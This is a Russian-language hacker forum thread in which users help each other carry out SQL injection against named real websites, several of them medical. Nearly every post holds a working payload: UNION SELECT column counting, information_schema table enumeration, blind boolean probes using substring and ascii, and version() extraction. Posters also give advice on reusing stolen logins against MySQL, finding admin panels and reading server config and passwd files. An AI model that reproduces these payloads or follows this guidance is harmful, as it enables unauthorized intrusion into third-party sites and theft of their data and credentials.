толку нету я думаю.. просто время убить... чтобы выводилась та инфа надо чтобы полям на странице ничего не присваивалось.. следовательно надо вызвать ошибочное обращение к базе например id=-1 или id=999999 но тут вместо этих ошибок идет переброс на главную страничку... обидно то что я в гугле с такой же уязвимостью именно в этом же скрипте нашел штук 20-30 сайтов... и все посвященый медицине... еще кстати наткнулся на вид ошибок... Code: http://lor-homeopat.ru/php/content.php?id=209' вот такого плана.. т.е. выводится ls -l в домашней папке, но как это разжевать я хз...
второй раз уже сталкиваюсь с такой ерундой: http://www.tati.ch/shop.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23..... так пробую до 100 колонок и все равно выдает ошибку Failed. Error: The used SELECT statements have a different number of columns В чем проблема, может кто подскажет? Неужели у меня руки не тем концом вставлены? =)
ппц, я что-то не додумался сразу version() или user() подставить, ошибку-то все равно показывает))) ладно, молодой - исправлюсь =)
gisTy, в таком случае помогают логические запросы например доступ к information_schema у тебя есть Code: http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables/* и есть подзапросы Code: http://www.beka.ru/php/content.php?id=1614+and+ascii(lower(substring(user(),4,1)))=53/* Imperou$, смотря откуда ты выдрал логин и пасс, если сайтов действительно много, большая вероятность удаленного подключения к серверу mysql, если не поможет поищи различные службы через passwd. если движок на сайте публичный можешь через гугл найти путь до админки, если не публичный помогут cgi-сканеры; тем более если на сайте есть новости значит их кто то добавляет) а вообще из названия таблицы обычно понятно к чему подходит логин:пароль)
Так чё,никто не знает,где путь до конфига в httpd.conf ? Выдрал этот грёбаный фаил и что дальше ? Ничего там нету.Что искать то ? Какие директивы ?
Ппц пасип те за статью Ж))))))))))),оч помогла)).Встали терь такие вопросы.К моему удивлению,.bash_history файла не оказалось ни у кого из юзеров (.В конфиге,лежащему по пути etc/httpd/conf/httpd.conf,нашёл одну директиву - AccessFileName .htaccess.Походу не прочитать мне буит их(.По идее,такая же директива нужна для каждого файла?).тобишь должна быть строка ещё AccessFileName .hpasswd.Хм...Есть ещё какойто конфиг,лежащий по адресу etc/httpd/conf/vhosts/Vhosts_ispconfig.conf.Тут много интересных директив,но про них в той статье не сказано было.Есть догадки...но что это конкретно за фаил кто-нибудь может пояснить ?) Да,и вот ещё что. В директивах ErrorLog указаны пути до лог файлов.Некоторые пути дают ошибку,хотя всё верно вводил.Некоторые пустые,но существуют 100%)).*Настоящего* лог-файла с даными ещё не встречал).Такое ощущение, что отключен лог ошибок вапще,ибо пхп.ини не прочитать =_____=
Помогите пожалуйста! Есть такой сайт http://www.modvlad.ru Как то на него залез и решил проверить на инъ...ю нашел ссылку http://www.modvlad.ru/photo/?g=37 проверил http://www.modvlad.ru/photo/?g=37' выдало: Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39 попробовал обратиться к базе не выходит подскажите плиз кто знает что дальше делать??
попробовал: http://www.modvlad.ru/photo/?g=-1+order+by+100/* и от 1 до 100 ни каких продвижений ошибка та же Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39 что делать дальше??
полей 6, а скуля слепая Code: http://modvlad.ru/photo/?g=33+and+if(substring((select+version()),1,1)=5,1,0)
http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+information_schema.tables+limit+38,1/* 38 Таблиц.Проще поискать скрипт с выводом =_________=.У меня тоже такое было.
Не слепая!!!! Открой исходный код страницы и поищи поля 3,4,5,6. Вывод в них Вот пример http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/* ищем в коде 444, и рядом видим версию 5.0.45-log
